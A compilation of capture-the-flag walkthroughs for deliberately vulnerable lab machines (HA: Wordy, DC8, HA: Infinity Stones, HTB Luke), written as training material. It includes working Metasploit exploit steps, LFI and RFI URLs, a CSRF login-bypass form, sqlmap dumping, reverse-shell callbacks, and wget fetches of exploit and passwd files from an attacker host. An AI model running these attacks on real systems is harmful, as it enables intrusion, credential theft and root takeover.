HA : Wordy Vulnhub Walkthrough

This is our Walkthrough for HA: Wordy” and this CTF is designed by Hacking Articles Team 😊, hope you will enjoy.

The lab is designed for Beginners for WordPress Penetration Testing Practices. This lab is designed as a Capture the flag and not as a boot to root, but it contains multiple Vulnerabilities (OWASP Top-10) that should be exploited to complete this CTF Challenge. This helps the CTF player to understand all the ways in which a WordPress machine can be vulnerable.

Level: Easy

You can download this lab from here.

Penetration Testing Methodology

Network Scanning

Host IP (Netdiscover)
Open Port & Services (Nmap)

Enumeration

Web Directory Brute force (Dirb)
Scanning WordPress (Wpscan)

Exploiting Reflex Gallery (1st Method: file Upload)

Spawning Shell (Metasploit)
Capture the 1^st flag

Privilege Escalation

Abusing SUID Binaries
Capture 2^nd Flag

Exploiting Mail_Masta & WP_Support (2nd Method- LFI & CSRF)

LFI
CSRF
Capture the flag
Inject PHP malicious code
Spawning Shell (Netcat)

Exploiting WP_Symposium (3rd Method: SQL Injection)

Web Directory Enumeration (Dirb)
Obtaining Database Info (Metasploit)

Exploit Gwolle Guestbook (4th Method: RFI)

Inject PHP malicious code
Spawning Shell (Netcat)

Exploit Slideshow Gallery (5th Method: Authenticated File_Upload)

Spawning Shell (Metasploit)

Walkthrough

Network Scanning

Starting with netdiscover, to identify host IP address and thus we found 192.168.0.27. let’s now go for advance network scanning using nmap aggressive scan.

nmap -A 192.168.0.27

1	nmap -A 192.168.0.27

We saw from the scan result that the port 80 open which is hosting Apache httpd service.

Enumeration

Since we got the port 80 open, we decided to browser the IP Address in the browser but found nothing.

Further, we move for directory enumeration and use dirb for brute-forcing.

dirb http://192.168.0.27/

1	dirb http://192.168.0.27/

This gave us a directory called “wordpress” as shown in the given image.

Upon finding the directory, we opened the URL in our browser.

Now that we have the wordpress site, it’s logical to perform a wpscan on our lab.

wpscan --url http://192.168.0.27/wordpress --enumerate p

1	wpscan --url http://192.168.0.27/wordpress --enumerate p

Now we move further down in the wpscan result and found the reflex gallery plugin. It is vulnerable to the File Upload. As you can observe that it has shown Metasploit module for exploiting reflex gallery.

Exploiting Reflex Gallery (1^st Method: file Upload )

Thus, we use the following module and set the argument such as rhosts and targeturi and then run the exploit to get the meterpreter session.

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload
msf5 > set rhosts 192.168.0.27
msf5 > set targeturi /wordpress
msf5 > exploit

msf5 > use exploit/unix/webapp/wp_reflexgallery_file_upload

msf5 > set rhosts 192.168.0.27

msf5 > set targeturi /wordpress

msf5 > exploit

Boom!! Here we have our meterpreter session which you can observe in the given below image.

meterpreter > shell
meterpreter >  python3 -c 'import pty; pty.spawn(/"bin/bash")'

1 2	meterpreter > shell meterpreter > python3 -c 'import pty; pty.spawn(/"bin/bash")'

Privilege Escalation

As soon as we gained the proper shell, we enumerated the machine for flags. We found flag1.txt in the /home/raj/ directory

cd /home
ls
cd raj
ls
cat flag1.txt

cd /home

cd raj

cat flag1.txt

Now for privilege escalation, It is a regular practice to check for any file having SUID permissions with the help of “Find” command. We used the following command to enumerate all binaries having SUID permissions:

find / -perm -u=s -type f 2>/dev/null

1	find / -perm -u=s -type f 2>/dev/null

Find command shown that wget and cp command has the SUID permissions. This could be possible for escalating root privilege.

SUID Binaries command gave us all the sensitive files that can be read/write and hence with the help of wget command we can overwrite the /etc/passwd.

“To know more how to edit /etc/passwd file read Full-Article from article1 & article2”.

Now we are creating the salt value of password for our new user and this will be done by using “openssl” following command as mentioned in the screenshot below:

openssl passwd -1 -salt ignite pass123

1	openssl passwd -1 -salt ignite pass123

And we will get our hash value something like this: “$1$ignite$3eTbJm980Hz.k1NTdNxe1”; This is going to help us create an entry of our user in the /etc/passwd file of the target machine. Now we have copied the entire content of /etc/passwd file as shown in the below image in our local machine.

cd /home/raj
cat /etc/passwd

1 2	cd /home/raj cat /etc/passwd

After pasting above copied content, we will edit a new record for the user “ignite” then paste the above-copied hash password in the record as shown below.

cat /etc/passwd

1	cat /etc/passwd

Now we want to overwrite passwd file inside /etc folder to replace the original passwd file. We can use wget with -O to download the passwd file from our machine inside a /etc directory which will overwrite the existing passwd file.

cd /home/raj
cd /etc
wget -O passwd http://192.168.0.16:8000/passwd

cd /home/raj

cd /etc

wget -O passwd http://192.168.0.16:8000/passwd

Now when you check, you will see that the / etc / passwd file has been updated as shown in the image below.

tail /etc/passwd

1	tail /etc/passwd

Now let’s try to access root shell and we have to switch user as ignite for escalating privileges.

su ignite
cd /root
ls
cat proof.txt

su ignite

cd /root

cat proof.txt

Awesome!! We found the final flag along with root privileges. Let’s go for the 2^nd method……..

Exploiting Mail_Masta & WP_Support (2^nd Method- LFI & CSRF)

We can solve the lab using another method as well. Earlier our Wpscan showed us the Mail Masta plugin which is vulnerable to LFI (Local File Inclusion). On exploring the following link, we got proof-of-concept would be to load passwd file.

http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

1	http://server/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

So, we framed our URL to exploit the LFI It turned out to be like this:

http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

1	http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd

Now we browsed the URL in our browser to find the output of cat command on /etc/passwd file.

Now after some enumeration, we found that there are some credentials stored inside the /etc/apache2/.htpasswd. So, let’s read them using curl while exploiting LFI.

curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd

1	curl http://192.168.0.27/wordpress/wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/apache2/.htpasswd

We were successful in obtaining a hash. It seemed like Base64 Encryption. We used the base64 command with -d parameter to decode this hash as shown in the image.

echo "YWFydGk6YWFydGlAZ21haWwuY29t" | base64 -d

1	echo "YWFydGk6YWFydGlAZ21haWwuY29t" \| base64 -d

It turned out to be aarti:[email protected] This must be login details but there is no password.

Aarti is a member of WordPress and server user account. We can confirm this from our previous assessment of wpscan result. It shows 2 users admin and aarti.

CSRF: WP Support Plus Responsive Ticket

When we scanned WordPress with wpscan for vulnerable plugins, we found many of them and here, one by one we can exploit them to our desire. To do so, we will use searchsploit in order to find exploits for wp support as this was hinted to us during the said scan. Therefore, type the following for this:

searchsploit wp-support
searchsploit -m 41006
cat 41006.txt

searchsploit wp-support

searchsploit -m 41006

cat 41006.txt

Once the above commands are executed, we will now copy the highlighted content and modify it (as shown in the image below) to change username value to “aarti” and email value to “[email protected]” :

<form method="post" action="http://wp/wp-admin/admin-ajax.php">
Username: <input type="text" name="username" value="aarti">
<input type="hidden" name="email" value="aarti@gmail.com">
<input type="hidden" name="action" value="loginGuestFacebook">
<input type="submit" value="Login">
</form>

Username: <input type="text" name="username" value="aarti">

</form>

As we execute the above script, the webpage will be directed to the log in the screen; asking us the username, which we have already found.

Here, as soon as we click on the login button, we will be logged in as a user without entering a password because of incorrect usage of wp_set_auth_cookie() due to CSRF vulnerability.

While traversing the website we found a second flag and a root password in biographical info.

The password we found was encoded using the base64 algorithm. To decrypt the password, we used the following command :

echo "SWduaXRlQDEyMw=="  |  base64 -d

1	echo "SWduaXRlQDEyMw==" \| base64 -d

Upon decryption, we found the root password is [email protected] This is the password for the admin user in WordPress.

Now, to proceed further we used the PHP reverse shell. We changed the IP Address to our current IP Address and give any port you want and start netcat listener for obtaining a reverse connection.

And then we copied the above php-reverse-shell and paste it in 404.php template of wordpress as shown in the image below :

Then after saving the 404.php file we will run the file through URL in a browser as shown in the image below :

Simultaneously, when you run netcat, you will have your session upon execution of 404.php file. Access netcat using the following command :

nc -lvp 1234

1	nc -lvp 1234

Exploiting WP_Symposium (3^rd Method: SQL Injection)

Enumeration

To further enumerate, we performed a Directory Bruteforce. There are a lot of situations where we need to extract the directories with a specific extension over the target server, and for this, we can use the -X parameter in dirb scan. This parameter accepts the file extension name and then searches the given extension files over the target server or machine. For instance, here we need to find text files, so we will use the following command for it :

dirb http://192.168.0.27  -X .txt

1	dirb http://192.168.0.27 -X .txt

Among all the text files the message in notes.txt stood out. It said, “you need to zip your way out” and this message is obviously a hint to look for a zip file.

Now, again we will use dirb -X extension to find zip.

dirb http://192.168.0.27 -X .zip

1	dirb http://192.168.0.27 -X .zip

Upon finding a zip file and then we download the file using the following wget and then unzip the command:

wget http://192.168.0.27/secret.zip
unzip secret.zip

1 2	wget http://192.168.0.27/secret.zip unzip secret.zip

To unzip the file successfully, you will need a password because it was a password protected zip file, but as we don’t know the said password, we will try to exploit a plugin.

We will use WordPress plugin wp-symposium version 15.5.1 which allows retrieving all the database content, which includes users’ details and password.

Luckily, we found exploit for this vulnerability inside Metasploit framework and thus load the below module and execute the following command

use auxiliary/admin/http/wp_symposium_sql_injection
msf auxiliary(wp_symposium_sql_injection) > set rhosts 192.168.0.27
msf auxiliary(wp_symposium_sql_injection) > set targeturi /wordpress
msf auxiliary(wp_symposium_sql_injection) > exploit

use auxiliary/admin/http/wp_symposium_sql_injection

msf auxiliary(wp_symposium_sql_injection) > set rhosts 192.168.0.27

msf auxiliary(wp_symposium_sql_injection) > set targeturi /wordpress

msf auxiliary(wp_symposium_sql_injection) > exploit

Nice!!! Here we found the relevant username and email id as user: admin and aarti respectively.

Now will unzip the file we found earlier that is secret.zip with hash we found in wp-symposium exploit.

cat link.txt

1	cat link.txt

As soon as we unzip the file, we found that this lab can be solved with multiple ways with the list of exploits.

Exploit Gwolle Guestbook (4^th Method: RFI)

Now again we will run wpscan to enumerate the themes and plugins and find a vulnerable plugin called “Gwolle Guestbook”. We search for the exploit and find that it is vulnerable to Remote File Inclusion (RFI).

We will follow the instructions according to the given POC on exploit-db and use the php-reverse-shell.php available on Kali Linux. We will copy it to desktop and rename it to wp-load.php. To execute our PHP shell using RFI we will start our python HTTP server to exploit RFI on the target machine.

mv php-reverse-shell.php shell.phpwp-load.php
python -m SimpleHTTPServer

1 2	mv php-reverse-shell.php shell.phpwp-load.php python -m SimpleHTTPServer

We set up our listener using netcat; as soon as we execute our php shell through RFI, we are successfully able to get a reverse shell.

http://192.168.0.27/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.27:8000/shell.php

1	http://192.168.0.27/wordpress/wp-content/plugins/gwolle-gb/frontend/captcha/ajaxresponse.php?abspath=http://192.168.0.27:8000/shell.php

Exploit Slideshow Gallery (5^th Method: Authenticated File_Upload)

Now we will exploit another vulnerable plugin that we found in secret.zip. The WordPress Slideshow Gallery plugin contains an authenticated file upload vulnerability. An attacker can upload arbitrary files to the upload folder. Since the plugin uses its own file upload mechanism instead of the WordPress API, it’s possible to upload any file type.

Metasploit

You will get exploit for this vulnerability inside Metasploit framework and thus load the below module and execute the following command:

use exploit/unix/webapp/wp_slideshowgallery_upload
set targeturi /wordpress
set rhosts 192.168.0.27
set wp_user admin
set wp_password Ignite@123
exploit

use exploit/unix/webapp/wp_slideshowgallery_upload

set targeturi /wordpress

set rhosts 192.168.0.27

set wp_user admin

set wp_password Ignite@123

exploit

As the above commands are executed, you will have your meterpreter session. Just as portrayed in this article, there are multiple methods to exploit a WordPress platformed website.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here

DC8: Vulnhub Walkthrough

DC8 VM is made by DCAU. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to bypass two-factor authentication, get root and to read a flag.

Level: Intermediate

Since these labs are available on the Vulnhub Website. We will be downloading the lab file from this link.

Penetration Testing Methodology

Network Scanning
- netdiscover
- nmap port scan
Enumeration
- Browsing HTTP Service
- SQL Injection for finding Credentials
- Performing Directory Bruteforce
Exploiting
- Editing HTML form
Privilege Escalation
- Exim Local Escalation
Capture the flag

Walkthrough

Network Scanning

The first step to attack is to identify the target. So, identify your target. To identify the target, we will use the following command:

netdiscover

1	netdiscover

Now we will run an aggressive port scan using nmap to gain the information about the open ports and the services running on the target machine.

nmap -A 192.168.0.6

1	nmap -A 192.168.0.6

We learned from the scan that we have the port 80 open which is hosting Apache httpd service with Drupal 7, and we have the port 22 open. This tells us that we also have the OpenSSH service running on the target machine.

Enumeration

Further, we need to start enumeration against the host machine, therefore we navigated to a web browser for exploring HTTP service, and DC:8- Welcome page will be opened in the browser. We enumerated the links provided on left. They seemed a bit fishy.

We enumerated these links to find SQL related Errors. So we used the single quote(‘) to get an error message. We will enumerate this error further.

After some enumeration and poking around, we realised it is definitely SQL Error. We decided to run the sqlmap against the target machine. Here, we set the risk at 3 and level at 5. This is the option we got the best results in the least time.

sqlmap -u 192.168.0.6/?nid=2 --dbs --batch --risk 3 --level 5

1	sqlmap -u 192.168.0.6/?nid=2 --dbs --batch --risk 3 --level 5

After working for some time our sqlmap gave us some important information. It showed us that there are 2 available databases in the target machine which are:

d7db
information_schema

Now that we got the database named ‘d7db’, it’s time to further enumerate this database. We re-constructed our sqlmap script with parameters like [–tables] [–batch]. This helps us to enumerate the tables inside the database.

sqlmap -u 192.168.0.6/?nid=2 -D d7db --tables --batch --risk 3 --level 5

1	sqlmap -u 192.168.0.6/?nid=2 -D d7db --tables --batch --risk 3 --level 5

This gave us a very large number of tables. We went through it with a keen eye. We found a table named ‘users’. This is definitely worth looking into.

Our reliable sqlmap provided us with further more details like we get the following details:

uid	name	init	Pass
1	admin	[email protected]	$D2tRcYRyqVFNSCONVYUrYeQbLQg5koMKtihYTIDC9QQqJi3ICg5z
2	john	[email protected]	$S$DqupvJbxVmqj r6cYePnx2A8911Ln7lsuku/3if/oRVZJaz5mKC2vF

So, we got hashes. Whenever we get some hashes all we remember is our best friend John The Ripper. The hashes were saved in a file named ‘hash’. We ran it through john. After working on it for some time. John cracked one of the hashes, it came out to be ‘turtle’.

john hash

john hash

This seemed as some information that might be useful somewhere else further down the road. For now, let’s try Directory Bruteforce using dirb. This surprisingly gave us a page with the name ‘user’.

dirb http://192.168.0.6

1	dirb http://192.168.0.6

On opening the page in our browser, we saw that it requires some login credentials. We found some credentials in our exploitation of SQL Injection. We logged in this panel using the following credentials:

Username: john

Password: turtle

After logging in it was time to look around and try different options. While enumerating we stumbled upon Form settings. Let’s take a closer look at it.

Exploiting

Here we saw that we had an option to change the text format. We changed it to PHP code. This revealed the php code on the webpage. We edited this page with our php reverse shell so as to generate a shell over the target machine.

Now that we have edited out php code, we also started a netcat listener to receive a shell that would be generated on the execution of our php reverse shell script.

nc -lvp 1234

1	nc -lvp 1234

Now to submit the form with our php reverse shell script, we would have to enter some of these mandatory data. This details can be anything but they should support the format of the data supposed to be entered.

After typing in all that information, we clicked on the submit button. After a few seconds, we got the shell from the target machine. It was a shell of user ‘www-data’. This was an improper shell. So, in order to convert it into a proper shell, we ran the python one-liner mentioned below.

After getting a proper shell, it was a time to escalate privilege on this machine. So, to do that we ran the find command to find the files with the SUID permissions. We found a service named exim4. Now, in order to proceed further, we are going to need the version of the exim4 tool. It will help us in searching for some exploit on the internet. This was found to be 4.89.

$ python -c 'import pty;pty.spawn("/bin/bash")'
www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null
www-data@dc-8:/$ exim --version | head -1

$ python -c 'import pty;pty.spawn("/bin/bash")'

www-data@dc-8:/$ find / -perm -u=s -type f 2>/dev/null

www-data@dc-8:/$ exim --version | head -1

Privilege Escalation

We surfed the web for an exploit regarding exim tool of version 4.89. ExploitDB came up with the rescue. It gave us this Local Privilege Escalation Exploit. We examined it carefully.

Firstly, we traversed into the /tmp directory, because we need to transfer a file and /tmp directory has the writable permission. We downloaded it into our attacker machine i.e Kali Linux and renamed it raptor_exim_wiz.sh. We edited our IP address and the port which we will be using to capture the netcat session. After that, we created a server on the Kali Linux to send the file directly to the target machine. We used the wget command for this transfer. After transferring the script on the target machine, we gave it proper permissions so that it can execute properly.

www-data@dc-8:/tmp$ wget http://192.168.0.8:8000/raptor_exim_wiz.sh
www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh

1 2	www-data@dc-8:/tmp$ wget http://192.168.0.8:8000/raptor_exim_wiz.sh www-data@dc-8:/tmp$ chmod 777 raptor_exim_wiz.sh

After providing with the proper permissions, it’s time to run a listener so that we can capture the shell which would be generated by this script. After that, we ran the command with the option to invoke netcat as shown in the image given below. This script invoked a netcat shell to our attacker machine on port 4444.

nc -lvp 4444
www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat

1 2	nc -lvp 4444 www-data@dc-8:/tmp$ ./raptor_exim_wiz.sh -m netcat

Capture the flag

We successfully got the shell on the target machine. On running the whoami command, we got a satisfactory response of ‘root’. We traversed into the root directory using the cd command. We found our flag at this location.

whoami
cd /root
ls
cat flag.txt

whoami

cd /root

cat flag.txt

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

HA: Infinity Stones Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: Infinity Stones” We have developed this lab for the purpose of online penetration practices. Solving this lab is not that tough if have proper basic knowledge of Penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 6 Flags on the victim’s machine.

Walkthrough

Firsts of all we try to identify our target and for this use the following command:

netdiscover

1	netdiscover

Now that we have identified our target using the above command, we can continue on to our second step that is scanning the target. We will use nmap to scan the target with the following command:

nmap -A 192.168.0.4

1	nmap -A 192.168.0.4

With the help of help scan, we now know that port number 22, 80, 443, 8080 are open with the service of SSH, HTTP, HTTPS, respectively. Now that port 80 is open we open the target IP address in our browser as shown in the following image :

It opened a webpage as shown in the above image. But as resulted in the nmap scanning port 8080 is also open, so now we opened our target IP with port 8080 and found a login page there as shown in the image below :

Now that we do not have login credentials, we explored using dirb in order to find directories, and in the result of dirb, we found two important directories i.e. /img and /wifi as shown in the image below :

First, of them, we opened, /img directory and there was a space.jpg we found there.

When opened this image was of the Tesseract. Nothing else in the image as you can see in the image below :

But if you remember, space stone was inside the tesseract, so we used the exif tool to see if there was metadata stored in the image. And for this use the following command :

exiftool space.jpg

1	exiftool space.jpg

And so, as you can see in the image below, our doubt was correct, because here we found our first flag i.e. spacestone. Now our infinity gauntlet is missing five more stones (flags). Let’s try and find them.

Our target also has port 443 open, which means there is a webpage on https, let’s try and open it. When you open the target IP on port 443, it shows something is not right with the SSL certificate which you can in the image below too :

Click on that lock icon and navigate yourself to its security as shown in the image below, as here you will find your second stone i.e. Mind stone. Four more stones to collect for there to be a perfect balance.

If you remember, with the /img directory we also found /wifi directory. So now let’s traverse through that.

Upon opening the said directory, we found two things i.e. pwd.txt and reality.cap. First, we downloaded pwd.txt to see what it had to offer. Use the following command to download it :

wget http://192.168.0.4/wifi/pwd.txt

1	wget http://192.168.0.4/wifi/pwd.txt

Once downloaded, we read the pwd.txt file using the cat command. And it said

“Your Password is thanos daughter name “gam” (note it’s all lower case) plus the following I enforced new requirement on you…12 characters

One uppercase character

Two numbers

Two lowercase

The year of the first avengers movie came out in theaters”

Now that we know password the format of the password so we will use crunch to make a wordlist for all the possible password combinations with the following command :

crunch 12 12 -t gam,%%@@2012 -o dict.txt

1	crunch 12 12 -t gam,%%@@2012 -o dict.txt

Now, the other file which we found was reality.cap so while examining that file, we found wifi packets in it. So, we used aircrack-ng and used our crunch created password list to find the wifi key. And voila! We found our wifi key as shown in the image below :

We used this wifi key as a directory and we found a realitystone.txt which further lead us to our reality stone. Three stones down, three more to go.

Now, for the next stone, we opened the target IP on the 443 port; it had a redirecting link on the top right side. Upon clicking on the link, we are redirected to a page where there is a quiz about avengers, and also some hint related to binary. As shown in the image below :

Upon solving the quiz, we had got the following answers with their corresponding binary value :

S.No.	Questions	Answers	Binary Value
1.	In the beginning, there are 3 infinity stones on earth.	False	0
2.	At the end, there are two survivors on Titan.	True	1
3.	Thanos already had the power stone when he first appeared.	True	1
4.	Tesseract contains the reality stone.	False	0
5.	The dwarf on Ndavellir is played by Peter Dinklage	True	1
6.	Red skull is the guardian of space stone.	False	0
7.	Thor’s new hammer is called stormbuster.	False	0
8.	Rocket is the only Guardian of the Galaxy to survive the snap.	True	1

After solving the quiz and identifying their binary values, we had a binary string i.e. 01101001. We opened this string of binary characters through the URL and there was a hints.txt and further opened it and found text encrypted through brainfuck algorithm.

So further, we decrypted the ciphertext and got its value as admin:avengers. Here, huge possibility is that this can be log in credentials which can be used on the log in page that we found on 8080.

As deduced above, we logged in by using the above-founded credentials and were welcomed with the following page :

The webpage has used Jenkins framework and it is commonly known for its vulnerability as in Metasploit there is an affective exploit for it. Therefore, we will use the following exploit and so, open Metasploit in kali and the following set of commands :

use exploit /multi/http/jenkins_script_console
set target 1
set rhosts 192.168.0.4
set username admin
set password avengers
set targeturi /
exploit

use exploit /multi/http/jenkins_script_console

set target 1

set rhosts 192.168.0.4

set username admin

set password avengers

set targeturi /

exploit

Once the exploit is executed, you will have a meterpreter session. And when you try to have shell by using the simple “shell” command but an improper shell session will be opened. To get a proper shell use the following command :

python3 -c 'import pty;pty.spawn("/bin/bash")'

1	python3 -c 'import pty;pty.spawn("/bin/bash")'

Now that we have the proper shell, we tried to look for the files which had SUID bits set on them and for that we used the following command :

find / -perm -u=s -type f 2>/dev/null

1	find / -perm -u=s -type f 2>/dev/null

After running the above command, we had a list and we enumerated through them one by one. Although the one that stood out was /opt/script. And the one that had our next stone i.e. time stone was /opt/script only as shown in the following image :

As we found our fourth stone in the /opt/script we decided to explore /opt a bit more. And for that we used the following a set of commands :

cd /opt
ls

1 2	cd /opt ls

The above commands allowed us to see the contents of /opt and there we found morag.kdbx. now this morag.kdbx is important for two reasons i.e. there was a planet named Morag in avengers series and .kdbx tells us that it might have password key database.

So we decided to open and we met with the following dialogue box :

As we didn’t know the ‘master password’, we decided to run a python script which created the key hash and then with the additional help of john the ripper we cracked the password and to do so, type :

python keepass.py morag.kdbx > hash
john hash

1 2	python keepass.py morag.kdbx > hash john hash

And as you can see in the image above, the master password is princesa. When entered this password, we found one enter on the flag tab which is powerstone. And so we found our fifth and second last stone/flag as shown in the image below :

Another tab, just below flags, is cred in the morag.kdbx password key database. When opened, it contained a base64 string as shown in the image below :

So we decoded the string using the following echo command :

echo "bW9yYWc6eW9uZHU=" | base64 -d

1	echo "bW9yYWc6eW9uZHU=" \| base64 -d

The string was then decoded to plain text i.e. morag:yondu, just like in the image below :

We have found five stones till now using each port except SSH. And the above-decoded string can be our log in credentials to log in through SSH. Therefore, we tried it using the following command :

ssh morag@192.168.0.4

1	ssh morag@192.168.0.4

And then, when further asked for password type ‘yondu’ and so you are logged in just as shown in the image below :

After logging in through SSH, we used ‘sudo -l’ command to see which user had no password and the result was : /usr/bin/ftp. So we switched the user to ftp and further accessed root to find our final flag by using the following set of commands :

sudo ftp
!/bin/bash
cd/root
ls
cat final.txt

sudo ftp

!/bin/bash

cd/root

cat final.txt

And so, we have found all the six stones aka flags and with just a snap there can be the perfect balance in the universe.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast. contact here

Hack the Box: Luke Walkthrough

Hello! Everyone and Welcome to yet another CTF challenge from Hack the Box, called ‘Luke,’ which is available online for those who want to increase their skills in penetration testing and Black box testing. Luke is a retired vulnerable lab presented by Hack the Box for making online penetration testing practice suitable to your experience level; they have a large collection of vulnerable labs as challenges ranging from beginner to expert level.

Level: Easy

Task: Find user.txt and root.txt in the victim’s machine

Penetration Methodologies

Scanning
- Nmap
Enumeration
- Logging in FTP as anonymous
- Browsing HTTP service
- Directory Scanning using Dirsearch
Exploitation
- Extracting Authentication token using curl
- Extracting User information using curl
- Extracting Password using curl
Privilege Escalation
- Logging in Ajenti Panel
Capturing the flag

Walkthrough

Network Scanning

Let’s get started then!

Since these labs have a static IP, the IP address for Luke is 10.10.10.137. Let us scan the VM with the most popular port scanning tool, nmap.

nmap -A 10.10.10.137

1	nmap -A 10.10.10.137

From the result above we found five working ports on the VM, port 21, 22, 80, 3000, 8000.

Here, we can saw that FTP allow anonymous login. So, we check it.

ftp 10.10.10.137
ftp> ls
ftp> cd webapp
ftp> ls
ftp> get for_Chihiro.txt

ftp 10.10.10.137

ftp> ls

ftp> cd webapp

ftp> ls

ftp> get for_Chihiro.txt

Through FTP login we found a for_Chihiro.txt file, where Chihiro or Derry might be usernames.

cat for_Chihiro.txt

1	cat for_Chihiro.txt

We found that the HTTP service runs on port 80, from nmap results. So, we browse the IP address of Target in the browser. We found a simple HTML page.

We also started a Directory Bruteforce in order to enumerate the machine further. This gave us some directories and files namely config.php, management etc.

./dirsearch.py -u http://10.10.10.137 -e php -x 400, 403, 404

1	./dirsearch.py -u http://10.10.10.137 -e php -x 400, 403, 404

We enumerated all of them. Among which config.php gave us some database credentials as shown in the image below.

We tried credentials on 10.10.10.137/management. But it gave back an unauthorized error. We will come back to it again.

Back to our nmap scan, we found that a Nodejs service running on port 3000. On browsing the IP Address with 3000 port, we got a message that says that auth token is not supplied.

We further did a Directory Bruteforce on port 3000. We found pages named /login and /users.

./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400, 403, 404

1	./dirsearch.py -u http://10.10.10.137:3000 -e php -x 400, 403, 404

After a bit of research, we can use the curl command to authenticate JWT token. For more, you can read this article from here.

The tricky part here is the username is admin and not root which we guessed.

So, the curl command with the admin as username and password we got earlier.

curl --header "Content-Type: application/json" --request POST --data '{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login

1	curl --header "Content-Type: application/json" --request POST --data '{"username":"admin", "password":"Zk6heYCyv6ZE9Xcg"}' http://10.10.10.137:3000/login

This gave us the auth token.

We enumerated usernames using the curl command with the help of the Authentication token we found earlier. This gave the users information as shown in the image given below.

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users

1	curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310' http://10.10.10.137:3000/users

We enumerated all users using the curl command. This gave use password for those users as shown in the image given below.

curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310’ http://10.10.10.137:3000/users/Derry

1	curl -X GET -H 'Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY4OTU2MTc5LCJleHAiOjE1NjkwNDI1Nzl9.h_myZ4FZXFxldR_L2ZK23py2EF410E6ipZn_X_lo310’ http://10.10.10.137:3000/users/Derry

We logged in the management page successfully using the credentials of user Derry.

User Name: Derry

Password: rZ86wwLvx7jUxtch

After logging in we found files named config.json, config.php and login.php. We enumerated all these files among which config.json seemed interesting.

The config.json file had some information related to ‘ajenti’ service running on port 8000 and a password.

We browsed the IP Address with the port 8000, It gave us another login form. We used the following credentials into the form. This successfully gave us the ajenti panel as shown in the image given below:

Username: root

Password: KpMasng655EtTy9Z

After Enumerating a bit, we saw the option to open terminal. On opening the terminal, we checked the user and group details using id command. It is a root shell. Here we enumerated the shell for the user and the root flags.

Author: Prabhjot Dunglay is a Cyber Security Enthusiast with 2 years of experience in Penetration Testing at Hacking Articles. Contact here.

Penetration Testing Methodology

Walkthrough

Network Scanning

Enumeration

Exploiting Reflex Gallery (1st Method: file Upload )

Privilege Escalation

Exploiting Mail_Masta & WP_Support (2nd Method- LFI & CSRF)

CSRF: WP Support Plus Responsive Ticket

Exploiting WP_Symposium (3rd Method: SQL Injection)

Enumeration

Exploit Gwolle Guestbook (4th Method: RFI)

Exploit Slideshow Gallery (5th Method: Authenticated File_Upload)

Metasploit

Penetration Testing Methodology

Walkthrough

Network Scanning

Enumeration

Exploiting

Privilege Escalation

Capture the flag

Walkthrough

Penetration Methodologies

Walkthrough

Network Scanning

Exploiting Reflex Gallery (1^st Method: file Upload )

Exploiting Mail_Masta & WP_Support (2^nd Method- LFI & CSRF)

Exploiting WP_Symposium (3^rd Method: SQL Injection)

Exploit Gwolle Guestbook (4^th Method: RFI)

Exploit Slideshow Gallery (5^th Method: Authenticated File_Upload)